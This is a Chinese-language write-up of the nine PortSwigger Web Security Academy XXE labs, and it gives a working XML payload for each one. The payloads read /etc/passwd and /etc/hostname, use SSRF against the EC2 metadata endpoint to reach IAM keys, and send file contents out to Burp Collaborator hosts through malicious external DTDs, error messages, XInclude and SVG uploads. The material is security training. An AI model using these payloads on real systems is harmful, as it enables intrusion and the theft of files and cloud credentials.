Portswigger web security academy:XML external entity (XXE) injection
Portswigger web security academy:XML external entity (XXE) injection
- Portswigger web security academy:XML external entity (XXE) injection
- 1 - Exploiting XXE using external entities to retrieve files
- 2 - Exploiting XXE to perform SSRF attacks
- 3 - Blind XXE with out-of-band interaction
- 4 - Blind XXE with out-of-band interaction via XML parameter entities
- 5 - Exploiting blind XXE to exfiltrate data using a malicious external DTD
- 6 - Exploiting blind XXE to retrieve data via error messages
- 7 -Exploiting XXE to retrieve data by repurposing a local DTD
- 8 - Exploiting XInclude to retrieve files
- 9 - Exploiting XXE via image file upload
1 - Exploiting XXE using external entities to retrieve files
题目描述
- Check stock功能点可能存在XXE
要求
- 读取
/etc/passwd
- 读取
解题过程
构造读取文件的exp
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
<stockCheck><productId>1&ext;</productId><storeId>1</storeId></stockCheck>
2 - Exploiting XXE to perform SSRF attacks
题目描述
- Check stock功能点可以XXE
- 在
169.254.169.254存在EC2元数据端点
要求
- 利用XXE进行SSRF,获取EC2中的IAM secret access key
解题步骤
构造exp
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1&xxe;</storeId></stockCheck>
这里需要把实体放在
productId中,因为该参数出错后会把输入的内容返回请求会返回目录,根据返回的目录逐层进入即可
3 - Blind XXE with out-of-band interaction
题目描述
- Check stock存在XXE
- 但是没有返回
要求
- 实现OOB(Out-Of-Band 外带) XXE
解题过程
利用burp自带的Collaborator构造exp
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://zrusv2avyq5v1n31ir5cestoefk58u.burpcollaborator.net/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1&xxe;</storeId></stockCheck>
4 - Blind XXE with out-of-band interaction via XML parameter entities
题目描述
- Check stock存在XXE
- 会阻止包含常规外部实体的请求
要求
- 实现OOB XXE
解题过程
从材料中得知,除了普通的外部实体,还有参数实体
借助参数实体构造exp
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE asd [ <!ENTITY % xxe SYSTEM "http://qwqj0tfm3ham6e8snia3jjyfj6pxdm.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
5 - Exploiting blind XXE to exfiltrate data using a malicious external DTD
题目描述
- Check stock存在XXE
要求
- 获取
/etc/hostname的内容
- 获取
解题步骤
借助collaborator构造参数实体exp并上传到exploirt server
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://y98rd1sugpnujml00qnbwrbnwe26qv.burpcollaborator.net/?%file;'>">
%eval;
%exfiltrate;
其中的
%是%的十六进制下的实体编码,用实体编码是为了防止报错%eval会解码并执行<!ENTITY % exfiltrate SYSTEM 'http://y98rd1sugpnujml00qnbwrbnwe26qv.burpcollaborator.net/?%file;'>,即进行参数实体exfiltrate的定义声明
构造xxe加载exp
<!DOCTYPE asd [<!ENTITY % ext SYSTEM "https://ac8f1f291f206d6880971508018f00ac.web-security-academy.net/exploit"> %ext;]
在collaborator client查看请求,复制并提交hostname
6 - Exploiting blind XXE to retrieve data via error messages
题目描述
- Check stock存在XXE
- exploit server可以放置恶意DTD
要求
- 通过报错信息获取
/etc/passwd的内容
- 通过报错信息获取
解题步骤
和上一题类似,先构造参数实体exp并上传到exploit server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
构造xxe加载exp
<!DOCTYPE asd [<!ENTITY % ext SYSTEM "https://ace71f7f1e8ca62780ce1c5f01dd00a4.web-security-academy.net/exploit"> %ext;]>
7 -Exploiting XXE to retrieve data by repurposing a local DTD
题目描述
- Check stock存在XXE
- 主机存在DTD文件
/usr/share/yelp/dtd/docbookx.dtd,且其中有一个实体叫做ISOamso
要求
- 借助材料中介绍的重定义外部DTD的方法,获取
/etc/passwd的内容
- 借助材料中介绍的重定义外部DTD的方法,获取
解题步骤
材料已经写的很详细了,直接构造exp
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
这个exp解决了当主机无法加载外网DTD文件时如何进行报错XXE的问题
巧妙之处在于,直接提交的XML:一个内部实体中不能包含另一个实体,但是通过加载并重定义本地DTD文件中的实体,可以解决这个问题

8 - Exploiting XInclude to retrieve files
题目描述
- Check stock存在XXE,用户输入会被嵌入服务端的XML中并随后被解析
要求
- 借助
XInclude语句获取/etc/passwd文件内容
- 借助
解题步骤
关于
XInclude可以看看这篇文章简而言之,它的作用和php的
include类似,把目标文件的内容包含进来构造exp
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
9 - Exploiting XXE via image file upload
题目描述
- 这个lab允许用户上传图片
- 服务端使用
Apache Batik library处理上传的图片
要求
- 通过XXE获取
/etc/hostname的内容并提交
- 通过XXE获取
解题步骤
尝试构造exp
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE asd [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg><xxx>&xxe;</xxx></svg>
报错500,然后尝试了很多其他格式和命名方式,都不行,去看了官方的solution。。。发现需要用svg的标准来写,因为最后内容会被转换为png
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Portswigger web security academy:XML external entity (XXE) injection的更多相关文章
- Portswigger web security academy:SQL injection
Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...
- Portswigger web security academy:Cross-site request forgery (CSRF)
Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
- Portswigger web security academy:Cross-origin resource sharing (CORS)
Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...
- Portswigger web security academy:OAth authentication vulnerable
Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...
- Portswigger web security academy:Server-side request forgery (SSRF)
Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...
- Portswigger web security academy:OS command injection
Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...
- Portswigger web security academy:Server-side template injection(SSTI)
Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...
随机推荐
- ts装饰器的用法,基于express创建Controller等装饰器
TS TypeScript 是一种由微软开发的自由和开源的编程语言.它是 JavaScript 的一个超集,而且本质上向这个语言添加了可选的静态类 型和基于类的面向对象编程. TypeScript 扩 ...
- JS五种绑定彻底弄懂this,默认绑定、隐式绑定、显式绑定、new绑定、箭头函数绑定详解(转载)
目录 壹 ❀ 引 贰 ❀ this默认绑定 叁 ❀ this隐式绑定 1.隐式绑定 2.隐式丢失 肆 ❀ this显式绑定 伍 ❀ new绑定 陆 ❀ this绑定优先级 柒 ❀ 箭头函数的this ...
- MySQL基础知识:创建MySQL数据库和表
虚构一个微型在线书店的数据库和数据,作为后续MySQL脚本的执行源,方便后续MySQL和SQL的练习. 在虚构这个库的过程中,主要涉及的是如何使用命令行管理 MySQL数据库对象:数据库.表.索引.外 ...
- 计算异质性H值(运用arcgis和Python进行区域分析)
最近需要对ecognition分割结果进行统计分析,以此来进一步判断其分割结果中的欠分割和过分割对象,在看了一篇论文后,发现了可以用一个参数H来判断每个切割对象的异质性,由于此方法需要用到arcgis ...
- MySQL入门(2)——存储引擎
MySQL入门(2)--存储引擎 查询MySQL支持的存储引擎 查询全部支持的引擎: show engines; ";"可以使用"\g"等价替换,而使用&quo ...
- Xshell(远程)连接不上linux服务器(防火墙介绍)
一.原因 远程(ssh)连接不上linux服务器的大多数原因都是因为本地服务器的防火墙策略导致的,因此我们想ssh远程能够连接上服务器,有两种方法: 修改防火墙策略 关闭防火墙 二.防火墙服务介绍 1 ...
- Java并发编程之并发关键字
volatile 保证可见性 一个线程修改volatile变量的值时,该变量的新值会立即刷新到主内存中,这个新值对其他线程来说是立即可见的 一个线程读取volatile变量的值时,该变量在本地内存中缓 ...
- 3、Spring教程之IOC创建对象方式
1.通过无参构造方法来创建 1.User.java public class User { private String name; public User() { System.out.printl ...
- 保姆级教程!使用k3d实现K3s高可用!
你是否曾经想尝试使用K3s的高可用模式?但是苦于没有3个"备用节点",或者没有设置相同数量的虚拟机所需的时间?那么k3d这个方案也许你十分需要噢! 如果你对k3d尚不了解,它的名字 ...
- 【Linux】关于Linux的系统编程总结
作者:李春港 出处:https://www.cnblogs.com/lcgbk/p/14673383.html 目录 系统编程 (一)进程 1.进程的概念 2.进程函数接口 (1)fork()在进程内 ...